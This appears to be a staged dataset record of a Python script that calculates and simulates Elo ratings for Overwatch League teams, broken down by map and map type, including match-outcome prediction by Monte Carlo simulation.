self.mapname_elos[t1][map['mapname']] += t1_change\n self.overall_elos[t2] += t2_change\n self.maptype_elos[t2][map['maptype']] += t2_change\n self.mapname_elos[t2][map['mapname']] += t2_change\n self.elorecords[t1][i].append(self.overall_elos[t1])\n self.elorecords[t2][i].append(self.overall_elos[t2])\n\n def getMapType(self, name):\n types = {**dict.fromkeys(['hanamura', 'horizon-lunar-colony',\n 'temple-of-anubis', 'volskaya', 'paris'], 'assault'), **dict.\n fromkeys(['dorado', 'junkertown', 'rialto', 'route-66',\n 'gibraltar', 'Havana'], 'escort'), **dict.fromkeys([\n 'blizzard-world', 'eichenwalde', 'hollywood', 'kings-row',\n 'numbani'], 'hybrid'), **dict.fromkeys(['busan', 'ilios',\n 'lijiang', 'nepal', 'oasis'], 'control')}\n return types[name]\n\n def predictMatch(self, team1, team2, maps, loops=10000):\n results = {}\n team1wins = 0\n maptypes = list(map(self.getMapType, maps))\n for x in range(loops):\n team1score = 0\n team2score = 0\n for i in range(len(maps)):\n drawchance = self.map_draws[maps[i]][0] / self.map_draws[maps\n [i]][1]\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.mapname_elos[team1][maps[i]\n ] * mapname_weight + self.maptype_elos[team1][maptypes[i]\n ] * maptype_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.mapname_elos[team2][maps[i]\n ] * mapname_weight + self.maptype_elos[team2][maptypes[i]\n ] * maptype_weight\n random_roll = random.random()\n team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n if random_roll < team1winchance - drawchance / 2:\n team1score += 1\n elif random_roll < team1winchance + drawchance / 2:\n pass\n else:\n team2score += 1\n if team1score == team2score:\n map5 = random.choice([m for m in ['ilios', 'busan',\n 'lijiang'] if m not in maps])\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.maptype_elos[team1]['control'\n ] * maptype_weight + self.mapname_elos[team1][map5\n ] * mapname_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.maptype_elos[team2]['control'\n ] * maptype_weight + self.mapname_elos[team2][map5\n ] * mapname_weight\n if random.random() < 1 / (1 + 10 ** ((elo2 - elo1) / d)):\n team1score += 1\n else:\n team2score += 1\n scoreline = '{}-{}'.format(team1score, team2score)\n if scoreline not in results:\n results[scoreline] = 0\n results[scoreline] += 1\n if team1score > team2score:\n team1wins += 1\n results = {s: (results[s] / loops) for s in results}\n return results, team1wins / loops\n\n def simulateSingleMatch(self, team1, team2, maps, type='regular',\n updateelos=True, firstto=4):\n \"\"\"\n Type can be regular, or playoffs.\n It is assumed team1 is the higher seed.\n \"\"\"\n types = [self.getMapType(m) for m in maps]\n score = [0, 0]\n\n def simulateMap(mapname, maptype):\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.mapname_elos[team1][mapname\n ] * mapname_weight + self.maptype_elos[team1][maptype\n ] * maptype_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.mapname_elos[team2][mapname\n ] * mapname_weight + self.maptype_elos[team2][maptype\n ] * maptype_weight\n random_roll = random.random()\n team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1\n ] * min(team1winchance, 1 - team1winchance) * 2\n if random_roll < team1winchance - drawchance / 2:\n act_t1, act_t2 = 1, 0\n elif random_roll < team1winchance + drawchance / 2:\n act_t1, act_t2 = 0.5, 0.5\n else:\n act_t1, act_t2 = 0, 1\n if updateelos:\n MoV = random.choice(self.margins_of_victory)\n exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d))\n if act_t1 == 1:\n elo_dif = elo1 - elo2\n elif act_t2 == 1:\n elo_dif = elo2 - elo1\n elif elo1 > elo2:\n elo_dif = elo1 - elo2\n elif elo1 > elo2:\n elo_dif = elo2 - elo1\n else:\n elo_dif = 0\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[team1] += t1_change\n self.maptype_elos[team1][maptype] += t1_change\n self.mapname_elos[team1][mapname] += t1_change\n self.overall_elos[team2] += t2_change\n self.maptype_elos[team2][maptype] += t2_change\n self.mapname_elos[team2][mapname] += t2_change\n return round(act_t1), round(act_t2)\n if type == 'regular':\n for i in range(len(maps)):\n score1, score2 = simulateMap(maps[i], types[i])\n score[0] += score1\n score[1] += score2\n if score[0] == score[1]:\n map5 = random.choice([x for x in mapnames if self.\n getMapType(x) == 'control' and x not in maps])\n score1, score2 = simulateMap(map5, 'control')\n score[0] += score1\n score[1] += score2\n if score[0] > score[1]:\n self.standings[team1]['w'] += 1\n self.standings[team2]['l'] += 1\n else:\n self.standings[team1]['l'] += 1\n self.standings[team2]['w'] += 1\n self.standings[team1]['d'] += score[0] - score[1]\n self.standings[team2]['d'] += score[1] - score[0]\n if type == 'playoffs':\n mappreferences = {t: {mt: [x for x in postseasonmappool if self\n .getMapType(x) == mt] for mt in maptypes} for t in [team1,\n team2]}\n for t in [team1, team2]:\n for mt in maptypes:\n mappreferences[t][mt].sort(key=lambda x: self.\n mapname_elos[t][x] - self.mapname_elos[{team1:\n team2, team2: team1}[t]][x], reverse=True)\n mapprogression = ['control', 'hybrid', 'assault', 'escort']\n scores = [0, 0]\n mnum = 0\n played = []\n picker = team1\n while max(score) < firstto:\n mtype = mapprogression[mnum % 4]\n mname = [m for m in mappreferences[picker][mtype] if m not in\n played][0]\n played.append(mname)\n mnum += 1\n score1, score2 = simulateMap(mname, mtype)\n if score1 == 1:\n picker = team2\n score[0] += 1\n elif score2 == 1:\n picker = team1\n score[1] += 1\n if score[0] > score[1]:\n return [team1, team2]\n else:\n return [team2, team1]\n return\n", "step-3": "<mask token>\nstart_elo = 0\ndecay_factor = 0.9\nk = 30\nd = 200\noverall_weight = 0.6\nmaptype_weight = 0.2\nmapname_weight = 0.2\nteams = ['ATL', 'BOS', 'CDH', 'DAL', 'FLA', 'GZC', 'HZS', 'HOU', 'LDN',\n 'GLA', 'VAL', 'NYE', 'PAR', 'PHI', 'SFS', 'SEO', 'SHD', 'TOR', 'VAN', 'WAS'\n ]\nmaptypes = ['control', 'assault', 'hybrid', 'escort']\nmapnames = ['Havana', 'temple-of-anubis', 'kings-row', 'hanamura',\n 'gibraltar', 'numbani', 'volskaya', 'hollywood', 'dorado', 'nepal',\n 'route-66', 'lijiang', 'ilios', 'eichenwalde', 'oasis',\n 'horizon-lunar-colony', 'junkertown', 'blizzard-world', 'rialto',\n 'busan', 'paris']\npostseasonmappool = ['lijiang', 'ilios', 'busan', 'horizon-lunar-colony',\n 'temple-of-anubis', 'hanamura', 'numbani', 'eichenwalde', 'kings-row',\n 'dorado', 'gibraltar', 'rialto']\ncolorrequests = requests.get('https://api.overwatchleague.com/teams',\n timeout=10).text\ncolordata = json.loads(colorrequests)['competitors']\n\n\nclass EloCalculations:\n\n def __init__(self):\n self.teamcolors = {}\n for teamdata in colordata:\n c = teamdata['competitor']\n self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor'\n ], '#' + c['secondaryColor']]\n self.matchdata = json.loads(open('data.json', 'r').read())\n self.overall_elos = {t: start_elo for t in teams}\n self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams\n }\n self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams\n }\n self.elorecords = {t: [[], [], [], []] for t in teams}\n self.stage4played = {t: (0) for t in teams}\n self.map_draws = {m: [0, 0] for m in mapnames}\n self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams}\n self.margins_of_victory = []\n\n def makeCopy(self, season):\n self.overall_elos = {t: season.overall_elos[t] for t in teams}\n self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in\n maptypes} for t in teams}\n self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in\n mapnames} for t in teams}\n self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1\n ]] for m in mapnames}\n self.margins_of_victory = [x for x in season.margins_of_victory]\n self.standings = {t: {'w': season.standings[t]['w'], 'l': season.\n standings[t]['l'], 'd': season.standings[t]['d']} for t in teams}\n\n def calculateElos(self):\n\n def applyStageDecay():\n for t in teams:\n self.overall_elos[t] *= decay_factor\n for m in mapnames:\n self.mapname_elos[t][m] *= decay_factor\n for m in maptypes:\n self.maptype_elos[t][m] *= decay_factor\n for i in range(4):\n stage = self.matchdata['stages'][i]\n applyStageDecay()\n for t in teams:\n self.elorecords[t][i].append(self.overall_elos[t])\n for match in (stage['regular'] + stage['playoffs']):\n if not match['completed']:\n continue\n t1, t2 = match['t1'], match['t2']\n if i == 3:\n self.stage4played[t1] += 1\n self.stage4played[t2] += 1\n if match in stage['regular']:\n if len([x for x in match['maps'] if x['result'] == 't1']\n ) > len([x for x in match['maps'] if x['result'] ==\n 't2']):\n self.standings[t1]['w'] += 1\n self.standings[t2]['l'] += 1\n else:\n self.standings[t1]['l'] += 1\n self.standings[t2]['w'] += 1\n for map in match['maps']:\n t1_elo = self.overall_elos[t1\n ] * overall_weight + self.mapname_elos[t1][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t1][\n map['maptype']] * maptype_weight\n t2_elo = self.overall_elos[t2\n ] * overall_weight + self.mapname_elos[t2][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t2][\n map['maptype']] * maptype_weight\n exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d))\n exp_t2 = 1 / (1 + 10 ** ((t1_elo - t2_elo) / d))\n act_t1 = 1 if map['result'] == 't1' else 0 if map['result'\n ] == 't2' else 0.5\n act_t2 = 1 if map['result'] == 't2' else 0 if map['result'\n ] == 't1' else 0.5\n self.map_draws[map['mapname']][0\n ] += 1 if act_t1 == 0.5 else 0\n self.map_draws[map['mapname']][1] += 1\n if match in stage['regular']:\n self.standings[t1]['d'] += 1 if map['result'\n ] == 't1' else -1 if map['result'] == 't2' else 0\n self.standings[t2]['d'] += 1 if map['result'\n ] == 't2' else -1 if map['result'] == 't1' else 0\n MoV = 1\n elo_dif = 0\n if act_t1 == 1:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif act_t2 == 1:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = t2_elo - t1_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = t2_elo - t1_elo\n self.margins_of_victory.append(MoV)\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[t1] += t1_change\n self.maptype_elos[t1][map['maptype']] += t1_change\n self.mapname_elos[t1][map['mapname']] += t1_change\n self.overall_elos[t2] += t2_change\n self.maptype_elos[t2][map['maptype']] += t2_change\n self.mapname_elos[t2][map['mapname']] += t2_change\n self.elorecords[t1][i].append(self.overall_elos[t1])\n self.elorecords[t2][i].append(self.overall_elos[t2])\n\n def getMapType(self, name):\n types = {**dict.fromkeys(['hanamura', 'horizon-lunar-colony',\n 'temple-of-anubis', 'volskaya', 'paris'], 'assault'), **dict.\n fromkeys(['dorado', 'junkertown', 'rialto', 'route-66',\n 'gibraltar', 'Havana'], 'escort'), **dict.fromkeys([\n 'blizzard-world', 'eichenwalde', 'hollywood', 'kings-row',\n 'numbani'], 'hybrid'), **dict.fromkeys(['busan', 'ilios',\n 'lijiang', 'nepal', 'oasis'], 'control')}\n return types[name]\n\n def predictMatch(self, team1, team2, maps, loops=10000):\n results = {}\n team1wins = 0\n maptypes = list(map(self.getMapType, maps))\n for x in range(loops):\n team1score = 0\n team2score = 0\n for i in range(len(maps)):\n drawchance = self.map_draws[maps[i]][0] / self.map_draws[maps\n [i]][1]\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.mapname_elos[team1][maps[i]\n ] * mapname_weight + self.maptype_elos[team1][maptypes[i]\n ] * maptype_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.mapname_elos[team2][maps[i]\n ] * mapname_weight + self.maptype_elos[team2][maptypes[i]\n ] * maptype_weight\n random_roll = random.random()\n team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n if random_roll < team1winchance - drawchance / 2:\n team1score += 1\n elif random_roll < team1winchance + drawchance / 2:\n pass\n else:\n team2score += 1\n if team1score == team2score:\n map5 = random.choice([m for m in ['ilios', 'busan',\n 'lijiang'] if m not in maps])\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.maptype_elos[team1]['control'\n ] * maptype_weight + self.mapname_elos[team1][map5\n ] * mapname_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.maptype_elos[team2]['control'\n ] * maptype_weight + self.mapname_elos[team2][map5\n ] * mapname_weight\n if random.random() < 1 / (1 + 10 ** ((elo2 - elo1) / d)):\n team1score += 1\n else:\n team2score += 1\n scoreline = '{}-{}'.format(team1score, team2score)\n if scoreline not in results:\n results[scoreline] = 0\n results[scoreline] += 1\n if team1score > team2score:\n team1wins += 1\n results = {s: (results[s] / loops) for s in results}\n return results, team1wins / loops\n\n def simulateSingleMatch(self, team1, team2, maps, type='regular',\n updateelos=True, firstto=4):\n \"\"\"\n Type can be regular, or playoffs.\n It is assumed team1 is the higher seed.\n \"\"\"\n types = [self.getMapType(m) for m in maps]\n score = [0, 0]\n\n def simulateMap(mapname, maptype):\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.mapname_elos[team1][mapname\n ] * mapname_weight + self.maptype_elos[team1][maptype\n ] * maptype_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.mapname_elos[team2][mapname\n ] * mapname_weight + self.maptype_elos[team2][maptype\n ] * maptype_weight\n random_roll = random.random()\n team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1\n ] * min(team1winchance, 1 - team1winchance) * 2\n if random_roll < team1winchance - drawchance / 2:\n act_t1, act_t2 = 1, 0\n elif random_roll < team1winchance + drawchance / 2:\n act_t1, act_t2 = 0.5, 0.5\n else:\n act_t1, act_t2 = 0, 1\n if updateelos:\n MoV = random.choice(self.margins_of_victory)\n exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d))\n if act_t1 == 1:\n elo_dif = elo1 - elo2\n elif act_t2 == 1:\n elo_dif = elo2 - elo1\n elif elo1 > elo2:\n elo_dif = elo1 - elo2\n elif elo1 > elo2:\n elo_dif = elo2 - elo1\n else:\n elo_dif = 0\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[team1] += t1_change\n self.maptype_elos[team1][maptype] += t1_change\n self.mapname_elos[team1][mapname] += t1_change\n self.overall_elos[team2] += t2_change\n self.maptype_elos[team2][maptype] += t2_change\n self.mapname_elos[team2][mapname] += t2_change\n return round(act_t1), round(act_t2)\n if type == 'regular':\n for i in range(len(maps)):\n score1, score2 = simulateMap(maps[i], types[i])\n score[0] += score1\n score[1] += score2\n if score[0] == score[1]:\n map5 = random.choice([x for x in mapnames if self.\n getMapType(x) == 'control' and x not in maps])\n score1, score2 = simulateMap(map5, 'control')\n score[0] += score1\n score[1] += score2\n if score[0] > score[1]:\n self.standings[team1]['w'] += 1\n self.standings[team2]['l'] += 1\n else:\n self.standings[team1]['l'] += 1\n self.standings[team2]['w'] += 1\n self.standings[team1]['d'] += score[0] - score[1]\n self.standings[team2]['d'] += score[1] - score[0]\n if type == 'playoffs':\n mappreferences = {t: {mt: [x for x in postseasonmappool if self\n .getMapType(x) == mt] for mt in maptypes} for t in [team1,\n team2]}\n for t in [team1, team2]:\n for mt in maptypes:\n mappreferences[t][mt].sort(key=lambda x: self.\n mapname_elos[t][x] - self.mapname_elos[{team1:\n team2, team2: team1}[t]][x], reverse=True)\n mapprogression = ['control', 'hybrid', 'assault', 'escort']\n scores = [0, 0]\n mnum = 0\n played = []\n picker = team1\n while max(score) < firstto:\n mtype = mapprogression[mnum % 4]\n mname = [m for m in mappreferences[picker][mtype] if m not in\n played][0]\n played.append(mname)\n mnum += 1\n score1, score2 = simulateMap(mname, mtype)\n if score1 == 1:\n picker = team2\n score[0] += 1\n elif score2 == 1:\n picker = team1\n score[1] += 1\n if score[0] > score[1]:\n return [team1, team2]\n else:\n return [team2, team1]\n return\n", "step-4": "import json, requests, math, random\nstart_elo = 0\ndecay_factor = 0.9\nk = 30\nd = 200\noverall_weight = 0.6\nmaptype_weight = 0.2\nmapname_weight = 0.2\nteams = ['ATL', 'BOS', 'CDH', 'DAL', 'FLA', 'GZC', 'HZS', 'HOU', 'LDN',\n 'GLA', 'VAL', 'NYE', 'PAR', 'PHI', 'SFS', 'SEO', 'SHD', 'TOR', 'VAN', 'WAS'\n ]\nmaptypes = ['control', 'assault', 'hybrid', 'escort']\nmapnames = ['Havana', 'temple-of-anubis', 'kings-row', 'hanamura',\n 'gibraltar', 'numbani', 'volskaya', 'hollywood', 'dorado', 'nepal',\n 'route-66', 'lijiang', 'ilios', 'eichenwalde', 'oasis',\n 'horizon-lunar-colony', 'junkertown', 'blizzard-world', 'rialto',\n 'busan', 'paris']\npostseasonmappool = ['lijiang', 'ilios', 'busan', 'horizon-lunar-colony',\n 'temple-of-anubis', 'hanamura', 'numbani', 'eichenwalde', 'kings-row',\n 'dorado', 'gibraltar', 'rialto']\ncolorrequests = requests.get('https://api.overwatchleague.com/teams',\n timeout=10).text\ncolordata = json.loads(colorrequests)['competitors']\n\n\nclass EloCalculations:\n\n def __init__(self):\n self.teamcolors = {}\n for teamdata in colordata:\n c = teamdata['competitor']\n self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor'\n ], '#' + c['secondaryColor']]\n self.matchdata = json.loads(open('data.json', 'r').read())\n self.overall_elos = {t: start_elo for t in teams}\n self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams\n }\n self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams\n }\n self.elorecords = {t: [[], [], [], []] for t in teams}\n self.stage4played = {t: (0) for t in teams}\n self.map_draws = {m: [0, 0] for m in mapnames}\n self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams}\n self.margins_of_victory = []\n\n def makeCopy(self, season):\n self.overall_elos = {t: season.overall_elos[t] for t in teams}\n self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in\n maptypes} for t in teams}\n self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in\n mapnames} for t in teams}\n self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1\n ]] for m in mapnames}\n self.margins_of_victory = [x for x in season.margins_of_victory]\n self.standings = {t: {'w': season.standings[t]['w'], 'l': season.\n standings[t]['l'], 'd': season.standings[t]['d']} for t in teams}\n\n def calculateElos(self):\n\n def applyStageDecay():\n for t in teams:\n self.overall_elos[t] *= decay_factor\n for m in mapnames:\n self.mapname_elos[t][m] *= decay_factor\n for m in maptypes:\n self.maptype_elos[t][m] *= decay_factor\n for i in range(4):\n stage = self.matchdata['stages'][i]\n applyStageDecay()\n for t in teams:\n self.elorecords[t][i].append(self.overall_elos[t])\n for match in (stage['regular'] + stage['playoffs']):\n if not match['completed']:\n continue\n t1, t2 = match['t1'], match['t2']\n if i == 3:\n self.stage4played[t1] += 1\n self.stage4played[t2] += 1\n if match in stage['regular']:\n if len([x for x in match['maps'] if x['result'] == 't1']\n ) > len([x for x in match['maps'] if x['result'] ==\n 't2']):\n self.standings[t1]['w'] += 1\n self.standings[t2]['l'] += 1\n else:\n self.standings[t1]['l'] += 1\n self.standings[t2]['w'] += 1\n for map in match['maps']:\n t1_elo = self.overall_elos[t1\n ] * overall_weight + self.mapname_elos[t1][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t1][\n map['maptype']] * maptype_weight\n t2_elo = self.overall_elos[t2\n ] * overall_weight + self.mapname_elos[t2][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t2][\n map['maptype']] * maptype_weight\n exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d))\n exp_t2 = 1 / (1 + 10 ** ((t1_elo - t2_elo) / d))\n act_t1 = 1 if map['result'] == 't1' else 0 if map['result'\n ] == 't2' else 0.5\n act_t2 = 1 if map['result'] == 't2' else 0 if map['result'\n ] == 't1' else 0.5\n self.map_draws[map['mapname']][0\n ] += 1 if act_t1 == 0.5 else 0\n self.map_draws[map['mapname']][1] += 1\n if match in stage['regular']:\n self.standings[t1]['d'] += 1 if map['result'\n ] == 't1' else -1 if map['result'] == 't2' else 0\n self.standings[t2]['d'] += 1 if map['result'\n ] == 't2' else -1 if map['result'] == 't1' else 0\n MoV = 1\n elo_dif = 0\n if act_t1 == 1:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif act_t2 == 1:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = t2_elo - t1_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = t2_elo - t1_elo\n self.margins_of_victory.append(MoV)\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[t1] += t1_change\n self.maptype_elos[t1][map['maptype']] += t1_change\n self.mapname_elos[t1][map['mapname']] += t1_change\n self.overall_elos[t2] += t2_change\n self.maptype_elos[t2][map['maptype']] += t2_change\n self.mapname_elos[t2][map['mapname']] += t2_change\n self.elorecords[t1][i].append(self.overall_elos[t1])\n self.elorecords[t2][i].append(self.overall_elos[t2])\n\n def getMapType(self, name):\n types = {**dict.fromkeys(['hanamura', 'horizon-lunar-colony',\n 'temple-of-anubis', 'volskaya', 'paris'], 'assault'), **dict.\n fromkeys(['dorado', 'junkertown', 'rialto', 'route-66',\n 'gibraltar', 'Havana'], 'escort'), **dict.fromkeys([\n 'blizzard-world', 'eichenwalde', 'hollywood', 'kings-row',\n 'numbani'], 'hybrid'), **dict.fromkeys(['busan', 'ilios',\n 'lijiang', 'nepal', 'oasis'], 'control')}\n return types[name]\n\n def predictMatch(self, team1, team2, maps, loops=10000):\n results = {}\n team1wins = 0\n maptypes = list(map(self.getMapType, maps))\n for x in range(loops):\n team1score = 0\n team2score = 0\n for i in range(len(maps)):\n drawchance = self.map_draws[maps[i]][0] / self.map_draws[maps\n [i]][1]\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.mapname_elos[team1][maps[i]\n ] * mapname_weight + self.maptype_elos[team1][maptypes[i]\n ] * maptype_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.mapname_elos[team2][maps[i]\n ] * mapname_weight + self.maptype_elos[team2][maptypes[i]\n ] * maptype_weight\n random_roll = random.random()\n team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n if random_roll < team1winchance - drawchance / 2:\n team1score += 1\n elif random_roll < team1winchance + drawchance / 2:\n pass\n else:\n team2score += 1\n if team1score == team2score:\n map5 = random.choice([m for m in ['ilios', 'busan',\n 'lijiang'] if m not in maps])\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.maptype_elos[team1]['control'\n ] * maptype_weight + self.mapname_elos[team1][map5\n ] * mapname_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.maptype_elos[team2]['control'\n ] * maptype_weight + self.mapname_elos[team2][map5\n ] * mapname_weight\n if random.random() < 1 / (1 + 10 ** ((elo2 - elo1) / d)):\n team1score += 1\n else:\n team2score += 1\n scoreline = '{}-{}'.format(team1score, team2score)\n if scoreline not in results:\n results[scoreline] = 0\n results[scoreline] += 1\n if team1score > team2score:\n team1wins += 1\n results = {s: (results[s] / loops) for s in results}\n return results, team1wins / loops\n\n def simulateSingleMatch(self, team1, team2, maps, type='regular',\n updateelos=True, firstto=4):\n \"\"\"\n Type can be regular, or playoffs.\n It is assumed team1 is the higher seed.\n \"\"\"\n types = [self.getMapType(m) for m in maps]\n score = [0, 0]\n\n def simulateMap(mapname, maptype):\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.mapname_elos[team1][mapname\n ] * mapname_weight + self.maptype_elos[team1][maptype\n ] * maptype_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.mapname_elos[team2][mapname\n ] * mapname_weight + self.maptype_elos[team2][maptype\n ] * maptype_weight\n random_roll = random.random()\n team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1\n ] * min(team1winchance, 1 - team1winchance) * 2\n if random_roll < team1winchance - drawchance / 2:\n act_t1, act_t2 = 1, 0\n elif random_roll < team1winchance + drawchance / 2:\n act_t1, act_t2 = 0.5, 0.5\n else:\n act_t1, act_t2 = 0, 1\n if updateelos:\n MoV = random.choice(self.margins_of_victory)\n exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d))\n if act_t1 == 1:\n elo_dif = elo1 - elo2\n elif act_t2 == 1:\n elo_dif = elo2 - elo1\n elif elo1 > elo2:\n elo_dif = elo1 - elo2\n elif elo1 > elo2:\n elo_dif = elo2 - elo1\n else:\n elo_dif = 0\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[team1] += t1_change\n self.maptype_elos[team1][maptype] += t1_change\n self.mapname_elos[team1][mapname] += t1_change\n self.overall_elos[team2] += t2_change\n self.maptype_elos[team2][maptype] += t2_change\n self.mapname_elos[team2][mapname] += t2_change\n return round(act_t1), round(act_t2)\n if type == 'regular':\n for i in range(len(maps)):\n score1, score2 = simulateMap(maps[i], types[i])\n score[0] += score1\n score[1] += score2\n if score[0] == score[1]:\n map5 = random.choice([x for x in mapnames if self.\n getMapType(x) == 'control' and x not in maps])\n score1, score2 = simulateMap(map5, 'control')\n score[0] += score1\n score[1] += score2\n if score[0] > score[1]:\n self.standings[team1]['w'] += 1\n self.standings[team2]['l'] += 1\n else:\n self.standings[team1]['l'] += 1\n self.standings[team2]['w'] += 1\n self.standings[team1]['d'] += score[0] - score[1]\n self.standings[team2]['d'] += score[1] - score[0]\n if type == 'playoffs':\n mappreferences = {t: {mt: [x for x in postseasonmappool if self\n .getMapType(x) == mt] for mt in maptypes} for t in [team1,\n team2]}\n for t in [team1, team2]:\n for mt in maptypes:\n mappreferences[t][mt].sort(key=lambda x: self.\n mapname_elos[t][x] - self.mapname_elos[{team1:\n team2, team2: team1}[t]][x], reverse=True)\n mapprogression = ['control', 'hybrid', 'assault', 'escort']\n scores = [0, 0]\n mnum = 0\n played = []\n picker = team1\n while max(score) < firstto:\n mtype = mapprogression[mnum % 4]\n mname = [m for m in mappreferences[picker][mtype] if m not in\n played][0]\n played.append(mname)\n mnum += 1\n score1, score2 = simulateMap(mname, mtype)\n if score1 == 1:\n picker = team2\n score[0] += 1\n elif score2 == 1:\n picker = team1\n score[1] += 1\n if score[0] > score[1]:\n return [team1, team2]\n else:\n return [team2, team1]\n return\n", "step-5": "import json, requests, math, random\n#import datagatherer\n\n# Constants:\nstart_elo = 0 # Starting elo\ndecay_factor = 0.9 # Decay % between stages\nk = 30 # k for elo change\nd = 200 # Difference in elo for 75% expected WR\noverall_weight = 0.60 # Weigts for different types of elos\nmaptype_weight = 0.20\nmapname_weight = 0.20\n\nteams = ['ATL','BOS','CDH','DAL','FLA','GZC','HZS','HOU','LDN','GLA','VAL','NYE','PAR','PHI','SFS','SEO','SHD','TOR','VAN','WAS']\nmaptypes = ['control','assault','hybrid','escort']\nmapnames = ['Havana', 'temple-of-anubis', 'kings-row', 'hanamura', 'gibraltar', 'numbani', 'volskaya',\n 'hollywood', 'dorado', 'nepal', 'route-66', 'lijiang', 'ilios', 'eichenwalde', 'oasis',\n 'horizon-lunar-colony', 'junkertown', 'blizzard-world', 'rialto', 'busan', 'paris']\n\npostseasonmappool = ['lijiang','ilios','busan','horizon-lunar-colony','temple-of-anubis','hanamura','numbani','eichenwalde',\n 'kings-row','dorado','gibraltar','rialto']\n\ncolorrequests = requests.get(\"https://api.overwatchleague.com/teams\",timeout=10).text\ncolordata = json.loads(colorrequests)['competitors']\n\nclass EloCalculations:\n def __init__(self):\n self.teamcolors = {}\n for teamdata in colordata:\n c = teamdata['competitor']\n self.teamcolors[c['abbreviatedName']]=[\"#\"+c['primaryColor'],\"#\"+c['secondaryColor']]\n\n self.matchdata = json.loads(open(\"data.json\",'r').read())\n\n self.overall_elos = {t:start_elo for t in teams}\n self.maptype_elos = {t:{m:start_elo for m in maptypes} for t in teams}\n self.mapname_elos = {t:{m:start_elo for m in mapnames} for t in teams}\n\n self.elorecords = {t:[[],[],[],[]] for t in teams}\n self.stage4played = {t:0 for t in teams}\n self.map_draws = {m:[0,0] for m in mapnames}\n\n self.standings = {t:{'w':0,'l':0,'d':0} for t in teams}\n\n self.margins_of_victory = []\n\n def makeCopy(self, season):\n self.overall_elos = {t:season.overall_elos[t] for t in teams}\n 